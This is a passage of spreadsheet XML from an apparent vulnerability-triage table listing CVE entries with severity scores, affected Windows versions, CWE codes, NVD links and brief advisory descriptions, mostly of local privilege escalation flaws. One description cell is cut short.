      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr"/>
      <c r="Q168" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>yshop-crm through 2.1.3 fails to enforce authorization on the saveRedisSet and getRedisSet endpoints in CrmCustomerController, allowing any authenticated back-office user to read and modify installation-wide lead-allocation and customer auto-recycling policy. Attackers can invoke these endpoints to manipulate shared Redis keys controlling customer auto-recycling behavior, causing mass customer data deletion, disabling lead recycling, or blocking customer creation across the deployment.</t>
        </is>
      </c>
      <c r="S168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92456</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68840</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K169"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69" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr"/>
      <c r="Q169" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69319</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K170"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70" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr"/>
      <c r="Q170" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69413</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K171"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71" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr"/>
      <c r="Q171" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69422</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K172" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr"/>
      <c r="Q172" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69814</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr"/>
      <c r="Q173" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69814</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69816</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K174"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174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr"/>
      <c r="Q174" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Accounts Control allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69816</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69817</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K175"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75" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr"/>
      <c r="Q175" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69817</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69818</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K176" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr"/>
      <c r="Q176" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69818</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69834</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K177"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77" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr"/>
      <c r="Q177" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69834</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69838</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K178"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78" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr"/>
      <c r="Q178" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69838</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69859</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K179"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79" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr"/>
      <c r="Q179" s="5" t="inlineStr">
        <is>
          <t>CWE-191, CWE-367</t>
        </is>
      </c>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="S179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69859</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69866</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K180" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr"/>
      <c r="Q180" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69866</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69889</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K181" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr"/>
      <c r="Q181" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69889</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69891</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K182"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182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr"/>
      <c r="Q182" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Media allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69891</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69896</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K183" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr"/>
      <c r="Q183" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69896</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69911</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K184"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84" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr"/>
      <c r="Q184" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69911</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70283</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K185"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85" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr"/>
      <c r="Q185" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70283</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70562</t>
